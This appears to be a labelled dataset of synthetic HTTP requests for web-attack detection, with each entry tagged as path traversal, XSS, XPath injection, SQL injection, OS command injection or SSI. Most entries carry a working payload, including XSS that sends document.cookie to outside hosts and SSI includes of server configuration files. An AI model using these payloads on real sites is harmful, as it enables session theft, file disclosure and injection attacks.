Expect: 100-continue
From: inr9@eduqt.it
If-Modified-Since: Wed, 23 May 07 12:13:34 UTC
If-Unmodified-Since: Mon, 02 Nov 09 22:44:33 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 38
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="tnharvec"
Authorization: Digest response="02dffa1Fb829C3fbED3BBcFED96d7571"
Range: 17672-41
Referer: /sti7gaMi.css
TE: trailers
Trailer: Connection
User-Agent: w42wlnrfy
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 880x8476
Via: 0.2 www.YdReeow.html, FTP/5.4 117.142.156.110, 0.8 www.iejeyet.js
Transfer-Encoding: compress
Upgrade: retod/3.9, tel/3.9, std/6.9, btts/4.3
Warning: 461 www.3izrso.tiff "rrcdd92qh0Axrii" 
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38001
Start - Id: 45927
class: PathTransversal
GET /ifBf5/eshy/iryihrEa5gaz/jmail4XwinntMGz_3bgsound-jM/iu@5cPo0Ok9l9@p77h/r-no85-cU@ur3gb/as/1UqzZ4BXWnNsoHU.png?ulMazeanwMEceAb=50&ehh5rRTLa3nbEn=J8pedsne&tosn=rTIeD7-vXh7N&zHaEAolh=b7-8&eEe=599&oihrdDh5a1ahde=asswtejE4&alat1aervi1r3=3581993155&Lujmadero6=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat HTTP/1.1
Host: www.giehc6c6.be:80
Connection: close
Accept: image/gif
Accept-Charset: koi8-r, x-mac-arabic;q=0.5, iso-8859-7, big5
Accept-Encoding: *
Accept-Language: 9-eio;q=0.8, Ame-3E;q=0.0, Hiwehea-ieeaebem;q=0.9, i-erzamrn
Cache-Control: max-stale=32117
Client-ip: 114.234.233.242
Cookie: 2cgn2n=gEcbe0ezttyh;taSvnDrfolSle=9sehC;Iuo=t;an7rns7natA=<;DnB0=t.IwnD8
Cookie2: $Version="3"
Date: Mon, 24 Jan 05 12:32:32 GMT
ETag: "1MT.AVtNT_x-4Gm"
Expect: 100-continue
From: leat@aeegln9ow.cz
If-Modified-Since: Fri, 17 Jun 05 17:18:56 CET
If-Unmodified-Since: Mon, 30 Aug 04 02:45:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM aGFhMWFwaHJtTmx0ckVuOGlpZWRucmFnZXMyTG0wM3QxRQ==
Authorization: Digest username="qeeAe0NT"
Range: -542428,64054-7678
Referer: http://www.Rte7tqdg.gov/do7ut6p/ra5en/eihn3/eIsic/eiaeooes.cfm
TE: deflate;q=0.6,trailers
Trailer: Upgrade
User-Agent: uoyaxTaA/9.7
UA-CPU: 68000
UA-Disp: 1794,840,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 880x5284
Via: 2.9 www.tscgi.jpg
Transfer-Encoding: identity
Upgrade: dhvol/0.8, Pde/4.9
Warning: 025 97.241.122.220:45 "riSehsrtuatehr" 
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 7013359045213548457
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45927
Start - Id: 47769
class: XSS
GET /hdeErPihalria/dSs@jDm4gk@wIzRK..shtml?bnvOyroa=%3Cimg++++src%3D+%22++livescript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.neleenni.com%2Fcgi-bin%2Flletde.cgi%27%2Bdocument.cookie%29%3B%5D+%22+++%3E HTTP/1.1
Host: www.rlgdNu.biz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, deflate;q=0.9, identity
Accept-Language: 7tna-an, nfn-ineiyne, arh9-3u1la
Cache-Control: max-age=89427
Client-ip: 91.90.227.252
Cookie: rhe7m=@rib;pleebsd=yZst;s9cem=iiecs4YNlabmtetnk;kmtnowiiaid4ae=iUte8ftptRseoobjectjxinetcat o>;laj0einhnhr=60480938;vbscriptmO0fwsrMOimg5=moi -access_log
Cookie2: $Version="49"
Date: Fri, 30 Jan 09 13:52:03 UTC
ETag: "q@9vcjf95.j6GZXaYbP"
Expect: nhsE=jgeiwe
From: ychumrg@eeAsehi.cz
If-Modified-Since: Mon, 17 Nov 08 16:47:17 UTC
If-Unmodified-Since: Tue, 22 May 07 13:41:05 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Oct 08 02:04:11 CET
Max-Forwards: 935
MIME-Version: 3.5
Pragma: g8=h0T
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: asgu eNir55I=ndip
Range: 0-6,74113-
Referer: http://tnedOEi.st/h4eb/lb8ots/b0wec.nsf
TE: chunked,deflate;q=0.4,deflate
Trailer: Date
User-Agent: Mozilla/8.7 (X11; U; Solaris 2.4; ln-st; rv:8.1.6) Gecko/02522654
UA-CPU: 68000
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2539x540
Via: 2.2 203.44.142.214, maz3ae/1.5 www.tytq8ic.jpeg
Transfer-Encoding: compress
Upgrade: ioe/1.5, oaei/8.3, ehtv/0.6
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47769
Start - Id: 47849
class: XSS
GET /oenTRD_-o/telntar1oLsuoyhmTl/eF/hu/0dtmtetEtTIeociemhh/gueeos/lPJHDwkWc0t@u8/hqvFFMQ9hOFyjaNpv37/s9cA9/wlU5/aQNBSrmd1b7I@/eehh6uAnrat2Lr564ald.sh?_Y_@JExform=09189276&4itnlx=h2q&io9emreRuefhr4a=ng8TfPH&diu9nmn=ecisyjinewut&2snsiqe=hieslthtrOxhoE8et&cfigo2=%3Cimg++++src++%3D++++%22+anndrereit+%22onmouseover++++%3D+%22++%5Bwindow.open%28%27http%3A%2F%2F100.116.72.12%2Fto.jsp%27%2Bdocument.cookie%29%3B%5D++++%22++++%3E&chEileb1tx=4131&wmxgly=32&aoei=eihjQlHq&rrae=Ersm&VnJsJ=smr%3Apshri&oietLlan=etseco1qimevyy&li7mz=230887472&eRowrtf=oco HTTP/1.1
Host: www.gq7k0.net
Connection: close
Accept: image/jpeg
Accept-Charset: x-mac-korean;q=0.1, windows-874, big5;q=0.1, shift_jis;q=0.6
Accept-Encoding: *
Accept-Language: eaEb-9, crehdaA-est4e2e;q=0.3, 7aqdwn-ttnwd
Cache-Control: no-transform
Client-ip: 159.4.130.135
Cookie: gTeoepa=e9eje esuy2sL;v9NTE4=aXe5Y1hy;dIeej=070869
Cookie2: $Version="459"
Date: Mon, 31 May 04 06:18:44 GMT
ETag: W/"LURUItJivcqELL-hp6D3"
Expect: uetaedh
From: tioExt@xadhwC.ch
If-Modified-Since: Fri, 15 Aug 08 11:35:41 CET
If-Unmodified-Since: Thu, 29 Apr 10 16:16:49 GMT
If-Match: "BIkRePsO_dXqGjOz"
If-None-Match: "voB8RggetRejnzwO"
If-Range: Thu, 20 Mar 08 18:12:35 GMT
Max-Forwards: 39
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: aibnm 3nd5Ean8=1Tde
Authorization: Digest realm
Range: 473-706269
Referer: http://www.rdrE2ede.it/wras/e95mn/oh2sl/Gru15dn.txt
TE: deflate;q=0.8,trailers
Trailer: Via
User-Agent: Mozilla/8.5 (Windows; U; WinNT 8.2; mr-Te; rv:1.4.6) Gecko/67333243
UA-CPU: x86
UA-Disp: 4309,162,32
Via: 3.5 108.77.172.17:258, 9.5 80.180.63.238, 6.0 27.223.246.185
Transfer-Encoding: gzip
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 626 136.170.222.193 "qysfxete3o" "Wed, 05 Sep 07 23:11:56 UTC"
X-Forwarded-For: 98.250.156.118
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47849
Start - Id: 49669
class: XPathInjection
GET /mL37fmaOntetmideette/9wsgmurrhXwo/6vbscriptXadmin0/9bDboot.initelnetm.jevalMspqr.png?PXwindow.openMVFCNP=4eT8i+owhere&lgrHn=oD%26&y3naaorlhO=6584&Ngd=haccepten0&fJPj2MSH0k=2915&-alI@Nj.dd0i=7dmerag%27+++++or+1%3C++++uhud%2FR%2Fe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D04%5D++++or+%27sgOl%27+%3D%27&aynnpDsA=Eaebouf0tn&2Fnservices=YoOR&we8rmttl4xoefiu=71 HTTP/1.0
Host: 51.193.175.199:5
Connection: close
Accept: video/quicktime;q=0.7, text/plain
Accept-Charset: utf-8, windows-1250;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-age=8592
Client-ip: 74.210.240.133
Cookie: _NvarFp2eSVAW=5si06pnTXr;hsesocrojre3=3
Cookie2: $Version="35"
Date: Thu, 12 Aug 04 17:08:22 UTC
ETag: "-oUkV855XGZ38_U5ND"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Fri, 13 May 05 06:29:47 CET
If-Unmodified-Since: Thu, 06 Sep 07 01:28:19 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jan 04 15:43:18 UTC
Max-Forwards: 68
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Daieeh fnea=l3o3no
Authorization: Basic cW9pb3NzOmVvdW5t
Range: -09
Referer: /DTnYVee/aitei/rtnwtge/saohe/ttyei6.htm
TE: trailers
Trailer: Range
User-Agent: Iee1iA2leoctbbmlieel
UA-CPU: Sparc
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 176x3474
Via: 7.3 www.beosnefe.shtml:962
Transfer-Encoding: gzip
Upgrade: nn7ooi/9.0
Warning: 044 www.ewuqbi.js "trhiteoe9" 
X-Forwarded-For: 73.197.107.241
X-Serial-Number: 40217863095
----: ------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49669
Start - Id: 35835
class: XPathInjection
GET /tdbiee0connf/iT93ZNZ1H_kF/sd.js?act=jY%27+++or+1%3C+++ks%2F7%2Fma0d%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D068%5D++++or+++++%27nxmaRefp%27++++%3D+%27 HTTP/1.1
Host: 234.212.62.169
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 48.181.108.67
Cookie: rtbhesl=et2irxr2hgsmew7hMX;sk=l 5a);hyeSoe='uce o nEre;hs9tnma=r?c@;iAughsa=4;ea=akW@57JLwM
Cookie2: $Version="003"
Date: Sat, 04 Jul 09 08:28:48 CET
ETag: "mUWr_rP0r53hp.28cK@"
Expect: saaE
From: t6Hzyl@dtgtOents.biz
If-Modified-Since: Tue, 29 Jan 08 06:52:09 UTC
If-Unmodified-Since: Wed, 17 Feb 10 24:54:29 GMT
If-Match: *
If-None-Match: "RpNIqkI9L_fw.d4uOhBh"
If-Range: "0crn@afHvUiXDXOWtSp"
Max-Forwards: 0446
MIME-Version: 8.2
Pragma: f='illiak'
Proxy-Authorization: do1ee dtreee=is8turnl
Authorization: NTLM Y3cwcHVlN3N4eWN2dnJubm5kajN0ZWVpdXNiNWloa2FuTDN5SXJ0aHlHaW9QZlA=
Range: 77-,-9
Referer: http://hlejw4o.org/imAiH/o7hm/itdetpf/2tle5.sh
TE: chunked,deflate;q=0.7
Trailer: Connection
User-Agent: omaiNAEti (7CcGs59U; tuk9UmmAvd; en6Z6Hefw; rCrtY_aX1J)
UA-CPU: MIPS
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: 5.0 78.151.251.170:4, wAaoeh/6.2 196.167.138.81
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 327 215.134.162.135 "tumeaatn0ePv5noa" "Fri, 09 Dec 05 05:29:32 UTC"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 9668656404576
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35835
Start - Id: 45573
class: PathTransversal
GET /Q1mJ7KT5jMXEJl/epe/dAimG50vVKhhZUz6b7YV/wdP6ZGmv7_J/rILiEb1dIgXLvtyIA/e9/04lho7xt.swf?4k0gqtei=%3BaemtuEwd+&be=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fatilente%2Ferenntas%2Fntesis%2Fve.jsp HTTP/1.0
Host: 173.68.102.41
Connection: t2esm
Accept: */*;q=0.9
Accept-Charset: iso-8859-9;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 80.183.70.158
Cookie: gemtrez=1317;enu=6608719;IT2x=228;sah=tqxzH;Xlocationca04NaZS1R=Tdgeeas
Cookie2: $Version="99"
Date: Thu, 13 Oct 05 17:00:15 CET
ETag: "INZLiNJ9EJe5m7Nfb"
Expect: chatt5r=iate7c;ywiims=cuttsa
From: nnmuo@mspetgyxi.de
If-Modified-Since: Wed, 01 Dec 04 20:22:48 UTC
If-Unmodified-Since: Wed, 13 Oct 04 09:03:55 CET
If-Match: "X9aWOG2g7DkPiP2AKB_"
If-None-Match: *
If-Range: *
Max-Forwards: 54
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: b7an3 ismsIo=k0ei
Range: -2
Referer: http://www.ssfr.de/eeoar/2ysdrs/Zths.asmx
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: Upgrade
User-Agent: Aajoe (tUwBiNP-Q; tERC5j; 1gMG8hmd)
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 952x387
Via: 2.0 164.227.208.93
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 368281150283459
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45573
Start - Id: 35249
class: SqlInjection
GET /FCbinjB0_documentlogQ0O/he/ez7hfOTr/sJrhttmlyol.jpg?oeiebIayygt=OR++++%278Bat%27++++BETWEEN+%27R%27++++AND++%27T%27&i4hT9=7699272 HTTP/1.1
Host: 141.115.37.227:41206
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312;q=0.2, euc-tw, big5;q=0.3, iso-8859-3
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=72
Client-ip: 150.203.233.233
Cookie: XSoMlEMNhc=69581;t2ernodltuout=hs;hsahinnrmpni=3660228295
Cookie2: $Version="9"
Date: Thu, 09 Sep 04 10:17:02 CET
ETag: "uT847SjOiACrZoY"
Expect: 100-continue
From: ieogO97c@1xtO.uk
If-Modified-Since: Wed, 30 Apr 08 15:57:24 CET
If-Unmodified-Since: Wed, 23 Nov 05 10:52:52 GMT
If-Match: "o64x6zlvVa_jB03.F"
If-None-Match: "@EliaMfR4Js8iSZ"
If-Range: "jW@Rm9CmGNHcSfF"
Max-Forwards: 0
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM QTllc3RURWF0cm9zaWVlcmRyZXd1aWx0ZXJ0NEk2UTByaXhsSGFlZXJnZWlzb3Q=
Range: 686-87074
Referer: /elrIh9/irSm5vi/edhEieJn.mdb
TE: gzip;q=0.6
Trailer: Warning
User-Agent: a2zhieti/0.7.0.2.3
UA-CPU: 68000
UA-Disp: 052,8339,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7374x0863
Via: 4.7 www.uNsdb.png, 9.8 133.107.43.188, 3.6 248.246.140.82
Transfer-Encoding: deflate
Upgrade: Eot/0.6, Efs/4.3
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 99658845770
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35249
Start - Id: 44220
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.1
Host: www.tjEdkctno.biz
Connection: close
Accept: video/quicktime, video/quicktime, text/html
Accept-Charset: iso-8859-1;q=0.2, x-mac-turkish
Accept-Encoding: *;q=0.2
Accept-Language: serttT-e;q=0.5
Cache-Control: min-fresh=9009
Client-ip: 227.197.106.185
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="572"
Date: Wed, 13 Jul 05 09:14:33 GMT
ETag: "yLFMRzHtZ@eekTE8YC"
Expect: et2ess1=aa0davZ;sinntl
From: rOaz@gEadsxsee.biz
If-Modified-Since: Sat, 23 Aug 08 05:22:59 CET
If-Unmodified-Since: Sun, 24 Jul 05 12:14:44 UTC
If-Match: *
If-None-Match: "SXp9m8A9eXa9yfR"
If-Range: Thu, 30 Oct 08 13:59:14 UTC
Max-Forwards: 6119
MIME-Version: 1.8
Pragma: leqmtnr='Enyn'
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: NTLM TW90b2V6UGVzbzRlbjR0a2xnamluZWJlaWVpeXNwNWFnZWlkcw==
Range: 09660-850419
Referer: http://hbqtt.net/nOii6bhr/xchTroo/9uhnhlcf/ng59Avjc.swf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.7 (compatible; 0wzune3; Open BSD i386; raepaoo)
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 352x848
Via: 8.3 www.apL7ee.shtml:97, 8.2 www.suDis.shtml
Transfer-Encoding: gzip
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 268 161.222.182.214 "sxsom" 
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44220
Start - Id: 41623
class: SqlInjection
GET /vehuspsn/eDMfn5e1VT/e6Sck_wzaZvtpFlv@lm/eteIaeE/@oY/oMjEMbksmQCWsBFSW/5teesot11yootzGgbarm/tP47e7Ar/sG.html?o5eLni=cnnLntorirjtt3&llS2CASn=dsuienB+tHts8e6ssystem&psdivvbA=En9e1riht&fpHGXmochaAKr0=%27+AND++++USER_NAME%28%29%3D%27eLi&formxbRyG=pTl&deWMecsra=qcRnX2Xruwn&5e=12991&snn0r1hh5=passthruyemailcopycateeslognqroiwheree9cn&eetSnct=EtARnrar&rss46wT3=awhDoo&Woouooaerogmh7a=27&enrteOyynoaOjT=ltrA&nqriE7dhntd=tTCQ9 HTTP/1.1
Host: 185.27.134.77
Connection: oyorvoi
Accept: */*;q=0.4
Accept-Charset: windows-1250;q=0.6, hz-gb-2312, windows-874;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: afgB6b-erE;q=0.2, dl-dsearnhq;q=0.1
Cache-Control: no-store
Client-ip: 166.71.235.134
Cookie: malee=fprl;fHaMopmhSe= iascate tbetweenti;e+;yeosh=471;iosasEyRawtte=Rgroup by;7centmlpintaNS=ySc(l
Cookie2: $Version="003"
Date: Fri, 09 Oct 09 17:09:20 UTC
ETag: W/"QJQjrAZViFkDgz2hkW"
Expect: llbt0
From: tcssd@oays6you.com
If-Modified-Since: Fri, 04 Apr 08 13:20:17 GMT
If-Unmodified-Since: Fri, 22 Oct 04 16:07:36 UTC
If-Match: "cxlhbw7Kf3x.fkR4"
If-None-Match: "uD5.dA5.g8fBDDRS"
If-Range: Fri, 30 Oct 09 04:44:29 UTC
Max-Forwards: 488
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: akeo5s nryIh=hnabaoI
Authorization: NTLM ZVN1NnFuZGx2cmVvNWNoZHRzaXRrZHNxZmVOdGVodGFnbjJlMnNjb3I=
Range: 537-
Referer: /wsst/dlin/lri6halc/Rtm9ae.nsf
TE: trailers
Trailer: Via
User-Agent: wNoct/8.7.8.6
UA-CPU: StrongARM
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 064x464
Via: 2.8 www.t5as.js
Transfer-Encoding: gzip
Upgrade: n0A/2.2, tlanud/5.2
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41623
Start - Id: 39712
class: SSI
GET /r5atcsLveoaioaaw7ad/ttbFjy3WjwHRf.htm?nPsofdwoitur=OtatlaMAxawhebV8s&krrst6=%3Cr&cO2p=436&3edEorTnczm=y1ZJgLCXjM&oalNgOtv=0989915&shdh=+rlemp%3Cgiadmin&azrzsdOkw=%3C%21--%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+--%3E&iotlwwhr=rsir4atop6afe5nd8&2ycopy2=He&ofs36efweh4lu=3e%40beobjecta+t0dSt%7Cmocha+r%2F4ec&oelisoteiKne=387&cohib3ol=s%3Edocumenta&V7ijreplaceepE1L=ido01dq&a5rfiwlaEi=%3AztSbEmw3&esIollh=te%26ee2mwb HTTP/1.1
Host: 247.107.218.103:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, deflate
Accept-Language: obttoc-6il, po-seh;q=0.1, cpeehlrw-yeoho07h
Cache-Control: no-transform
Client-ip: 90.61.188.169
Cookie: d0krgrd1steskn=oN<stte hcdon;1Lnts8g=siaRi
Cookie2: $Version="1"
Date: Thu, 24 Aug 06 15:15:36 UTC
ETag: "eQt1lpFUkKACMULNX9"
Expect: 100-continue
From: n3Pwa2et@Siotzakt2.gov
If-Modified-Since: Sun, 11 Nov 07 04:02:45 UTC
If-Unmodified-Since: Sat, 01 Jan 05 22:43:38 GMT
If-Match: "UneUwK3Zo2JVwm@n1L"
If-None-Match: "sxPKoV3rJ.qan7-7SX45"
If-Range: Sun, 29 Jan 06 07:21:27 GMT
Max-Forwards: 249
MIME-Version: 4.8
Pragma: detqeL=scetpb1g
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: Digest response="0b93D9f8E6f3ad98D83d2F0A8EE033D0"
Range: 61-,98874-5,222224-
Referer: http://Dha0lru.cz/qqbyE.php4
TE: deflate;q=0.3,deflate
Trailer: If-None-Match
User-Agent: Mozilla/0.7 (Windows; U; Windows NT 5.2; Hr-el; rv:9.5.8) Gecko/82253637
UA-CPU: Sparc
UA-Disp: 3264,053,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 066x3039
Via: 5.8 84.224.120.12, FTP/1.1 60.115.141.73
Transfer-Encoding: elvsn; 3fhpaat=nhcom
Upgrade: effn/5.2, ajnt/0.1
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 227.157.179.153
X-Serial-Number: 9911764547155
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39712
Start - Id: 47291
class: XSS
GET /ZPfAhoiXZw6Y/xp_execm.htm?aezmloi=%5B%5CxC0%5D%5B%5CxBC%5Dscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F34.148.208.203%2Fleet.swf%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript%3E&Ercanclia=ctiSwybssotbTHps&egeueed=rsuttoanlvhykh HTTP/1.0
Host: www.nrtm.biz
Connection: swena
Accept: */*
Accept-Charset: macintosh
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 156.129.47.155
Cookie: rpLQEexecbcr=2890;Ifnnfonl=77903127;seitemxrrTimat=:gandue
Cookie2: $Version="2"
Date: Tue, 11 Jul 06 18:18:20 GMT
ETag: "KmZTbRZXFFNBbAT"
Expect: 100-continue
From: peTeu9@mayraae.fr
If-Modified-Since: Fri, 07 Mar 08 02:57:40 CET
If-Unmodified-Since: Mon, 14 Sep 09 15:13:42 UTC
If-Match: *
If-None-Match: "jhav@snYxsBoqBJs8YJ"
If-Range: Thu, 18 May 06 01:02:06 GMT
Max-Forwards: 087
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic d2VheToxTGVmZQ==
Range: -4,7256-5,39-5314
Referer: /ryIeeeh.tiff
TE: gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/3.5 (Machintosh; U; PPC 5.5; an-oo; rv:0.6.5) Gecko/93566320
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 979x278
Via: 5.3 10.250.186.184, FTP/5.4 129.12.128.189
Transfer-Encoding: identity
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 136.201.136.92
X-Serial-Number: 269675731221597037
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47291
Start - Id: 50035
class: XPathInjection
PUT /rn/JkAmetaNeJK_t8mselect/iFhO27NOkXi3moT7JY.exe? HTTP/1.0
Content-Length: 76
Content-Encoding: compress
Content-MD5: M3diaHJsU3RvOHRuM0xoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 18 Apr 07 09:53:42 GMT
Host: 148.51.105.77
Connection: ceIooUst
Accept: */*;q=0.7
Accept-Encoding: (i    <  count(shcheu/child::text()) and j   <  count(hsufdd/child::comment())  and    k  <   count(omtefc/child::*)  )
Accept-Language: as-o, nnHsAsa-lKhtOta, 8wanbrh-l;q=0.4, Nikh-rljy;q=0.3, nn7i-eh
Cache-Control: min-fresh=9157
Date: Sun, 27 Sep 09 01:44:26 CET
If-None-Match: "0O4yeKOwAO8T@-0gpA_"
Max-Forwards: 38
Authorization: Basic a0UxczU6RWFzcTBsYQ==
Referer: /snxnsj/atde6hil/NlhE/srctme/eznt.pdf
User-Agent: Mozilla/4.2 (X11; U; Unix 9.1; ag-tS; rv:9.1.3) Gecko/26141896
X-Forwarded-For: 5.28.189.137

n03n=eHx@WCU&9rhar=wiNaitsreaLhz&LBnuBmanrdyxue=8512530&oLcptrtli=Tgechild

End - Id: 50035
Start - Id: 48322
class: XPathInjection
GET /anNP3dHz_./4rs/ettdhsdOSmioErdeieeq.js?axaat82idiIaete=s%3DEom&eest2sl=439592475&reyyd=185746&cd1feIy4il=n7H4xKhti6MM&eoi4Fo=5smei&2atacmtwara=843758&izotev4e=at0osc&ea5a1meoetvta=h3u_bu26Fj&cozeey4ao7hc6l=377385629&8edSeevscnaeeK9=Fg HTTP/1.0
Host: 228.153.60.227
Connection: dugiGe
Accept: video/*;q=0.7, image/*;q=0.4, image/jpeg;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 237.124.54.227
Cookie: tgti=219288;Euaacnojm=i
Cookie2: $Version="9"
Date: Sun, 31 Oct 04 16:18:54 GMT
ETag: W/"683Tkn1roCDkCKGYEt"
Expect: 100-continue
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Sun, 17 Apr 05 23:43:52 UTC
If-Unmodified-Since: Thu, 10 Apr 08 12:07:25 UTC
If-Match: *
If-None-Match: *
If-Range: "od@Rp-TXux0Nbrg"
Max-Forwards: 2705
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic dG5tb2ZrRTplaWlkeQ==
Authorization: NTLM cmhmYmtpRTZ5aEdkeTFyN3BlWENoZmNEY2xuT290dXRuaXZnTGxhUA==
Range: -1
Referer: /Ege6rhr/nrhi/te1s3TaC/h8pqla.nsf
TE: trailers,chunked;q=0.9
Trailer: If-Modified-Since
User-Agent: spsd' or     path/child::node()[position()=N]  or  'katiah'   ='
UA-Disp: 296,6544,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 433x249
Via: 2.0 www.t0mmawe.png, nrtuys/5.1 49.216.157.142
Transfer-Encoding: identity
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 515 www.ym4eeqof.jpg:0 "8RqeaelobLhe" "Thu, 13 Nov 08 14:12:40 GMT"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48322
Start - Id: 40616
class: SSI
GET /rhsHnP6BN0v5WMH5/9bGB-.pl?ysnaeoW0nr=stegcC&zpi9sose=149&eruhsQertLe=%3C%21--+++++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E&whdeecDesspet=416455&adrptp5h62mafe=s&rnpH2n=oohod7Idp&attto=+Eagk&seutdqngh2Suftz=2&deaic=825&elt4tcoayf=++%3Frlsas&esctmnweelm=7ei&ieqs=oxCw HTTP/1.1
Host: www.ap8qbhetwd.it:80
Connection: keep-alive
Accept: */*
